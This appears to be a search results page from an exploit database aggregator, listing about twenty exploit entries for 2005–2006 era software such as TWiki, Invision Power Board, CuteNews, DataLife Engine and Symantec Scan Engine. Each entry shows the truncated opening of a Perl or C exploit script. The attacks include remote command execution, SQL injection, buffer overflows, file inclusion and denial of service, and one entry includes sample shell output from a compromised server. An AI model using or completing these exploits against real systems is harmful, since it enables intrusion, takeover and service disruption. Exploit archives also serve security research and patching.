217 matches found
MTCMS 2.0 - adminadmin_settings.php Remote File Inclusion
MTCMS 2.0 - adminadminsettings.php Remote File Inclusion !/usr/bin/perl +------------------------------------------------------------------------------------------- + MTCMS + Requirements.......: registerglobals = on...
TWiki <= 4.0.4 (configure) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl Tue Aug 1 13:18:12 CEST 2006 [email protected] use strict; use LWP::UserAgent; use LWP::Simple; use HTTP::Request; use HTTP::Response; use Getopt::Long; $| = 1; couse 1 is bigger than 0 my $proxy,$proxyuser,$proxypass; my $host,$debug,$dir,...
Essentia Web Server 2.15 (GET Request) Remote DoS Exploit
No description provided by source. !/usr/bin/perl use IO::Socket; use Getopt::Std; getopts'h:', %args; if defined$args'h' $host = $args'h'; print STDERR "\n-= Essentia Web Server 2.15 Remote DOS Exploit=-\n"; print STDERR "-= Discovered By CorryL [email protected] =-\n"; print STDERR "-= Coded b...
Essentia Web Server 2.15 - GET Remote Denial of Service
Essentia Web Server 2.15 - GET Remote Denial of Service !/usr/bin/perl use IO::Socket; use Getopt::Std; getopts'h:', %args; if defined$args'h' $host = $args'h'; print STDERR "\n-= Essentia Web Server 2.15 Remote DOS Exploit=-\n"; print STDERR "-= Discovered By CorryL [email protected] =-\n";...
Tr Forum 2.0 SQL Injection / Bypass Security Restriction Exploit
Exploit for unknown platform in category web applications ================================================================ Tr Forum 2.0 SQL Injection / Bypass Security Restriction Exploit ================================================================ !/usr/bin/perl Affected.scr..: Tr Forum V2.0...
TWiki 4.0.4 - 'configure' Remote Command Execution
!/usr/bin/perl Tue Aug 1 13:18:12 CEST 2006 [email protected] use strict; use LWP::UserAgent; use LWP::Simple; use HTTP::Request; use HTTP::Response; use Getopt::Long; $| = 1; couse 1 is bigger than 0 my $proxy,$proxyuser,$proxypass; my $host,$debug,$dir, $command; my $options = GetOptions 'host=...
Winlpd 1.2 Build 1076 - Remote Buffer Overflow
!/usr/bin/perl A proof of concept Remote Buffer Overflow Exploit App Vulnerable: Winlpd 1.2 Build 1076 - rabox.com Possibe some problems with WinXP if exploit doesn't work correctly, try another number in var 'loop'. Buffer size 524 bytes. Author: Pablo Isola - [email protected] Neuquen ...
DataLife Engine <= 4.1 Remote SQL Injection Exploit (perl)
No description provided by source. !/usr/bin/perl DataLife Engine sql injection exploit by RST/GHC coded by 1dt.w0lf RST/GHC http://rst.void.ru http://ghc.ru 18.06.06 use LWP::UserAgent; use Getopt::Std; getopts'u:n:p:'; $url = $optu; $name = $optn; $prefix = $optp || 'dle'; if!$url || !$name $sn...
iShopCart vGetPost() Remote Buffer Overflow Exploit (cgi)
No description provided by source. / Creator: K-sPecial xzziroz.net of .aware awarenetwork.org Name: ishopcart-cgi-bof.c = easy-scart6.c Date: 5/25/2006 Version: 1.00 5/25/2006 - ishopcart-cgi-bof.c created Description: there is an overflow in the vGetPost function, it does not do any size checki...
HiveMail 1.3 - addressbook.add.php Remote Code Execution
HiveMail 1.3 - addressbook.add.php Remote Code Execution !/usr/bin/perl HiveMail = 1.3 remote command execution exploit Advisory: http://www.gulftech.org/?node=research&articleid=00098-02102006 To get the hivesession: log on hivemail with firefox then look at the hivesession number in the url. ye...
Invision Power Board 2.* commands execution exploit
Exploit for php platform in category web applications !/usr/bin/perl Invision Power Board 2. commands execution exploit by RST/GHC vulnerable versions new Proto = "tcp", PeerAddr = "$host", PeerPort = "80" || die "- CONNECTION FAILED"; $login = s/./"%".ucsprintf"%2.2x",ord$1/eg; $password =...
Invision Power Board 2.1.5 - search.php Remote Code Execution
Invision Power Board 2.1.5 - search.php Remote Code Execution !/usr/bin/perl Wed Apr 26 16:44:15 CEST 2006 [email protected] INVISION POWER BOARD 2.1.5 pr00f 0f c0ncept remote command execution. vuln credits goes to IceShaman. works only if you have perms to post a comment. Exploit with replye is...
Invision Power Board 2.1.5 - lastdate Remote Code Execution
Invision Power Board 2.1.5 - lastdate Remote Code Execution !/usr/bin/perl Invision Power Board 2. commands execution exploit by RST/GHC vulnerable versions new Proto = "tcp", PeerAddr = "$host", PeerPort = "80" || die "- CONNECTION FAILED"; $login = s/./"%".ucsprintf"%2.2x",ord$1/eg; $password =...
Symantec Scan Engine 5.0.x - Change Admin Password
Symantec Scan Engine 5.0.x - Change Admin Password !/usr/bin/perl -w Remotely change the administrator password or password hash of Symantec Scan Engine. Author: Marc Bevand of Rapid7 Copyright 2006 Rapid7, LLC. All rights reserved. Redistribution and use in source and binary forms, with or witho...
Horde Help Viewer 3.1 - Remote Command Execution
!/usr/bin/perl Wed Apr 5 21:51:12 CEST 2006 [email protected] Horde help module remote execution telnet 310.27.901.33.1109 1689 thanks horatio for the address USER paranoia PASS total SYST REST 100 REST 0 PWD TYPE A PASV LIST CWD 0days GET horddy.pl w0w this damn 0day ftp is so sexy! GO GO GO !! ...
phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)
phpRPC Library 0.7 - XML Data Decoding Remote Code Execution 2 !/usr/bin/perl phpRPC All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ $Id: cijfer-prpcxpl.pl,v 0.1 2006/03/01 05:46:00 cijfer Exp $ use LWP::UserAgent; use...
phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)
!/usr/bin/perl phpRPC All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ $Id: cijfer-prpcxpl.pl,v 0.1 2006/03/01 05:46:00 cijfer Exp $ use LWP::UserAgent; use URI::Escape; use Getopt::Long; use Term::ANSIColor; $res =...
YapBB <= 1.2 (cfgIncludeDirectory) Remote Command Execution Exploit
Exploit for unknown platform in category web applications =================================================================== YapBB All rights reserved. never ctrl+c again. cijfer$ http://target.com/dir host changed to 'http://target.com/dir' cijfer$ to set your PHP shell location: cijfer$...
creLoaded <= 6.15 (HTMLAREA) Automated Perl Exploit
No description provided by source. !/usr/bin/perl creLoaded = 6.15 HTMLAREA automated perl exploit hacked up by kaneda [email protected] Rather simple exploit, but still an exploit nonetheless. Attempts to upload php script and utilise that to execute commands, and show off a fake shell. C...
CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl cijfer-cnxpl - CuteNews =1.4.1 Remote Command Execution Copyright c 2005 cijfer [email protected] All rights reserved. 1. example cijfer@kalma:/research$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news [email protected] /$ id;uname -a uid=48apache...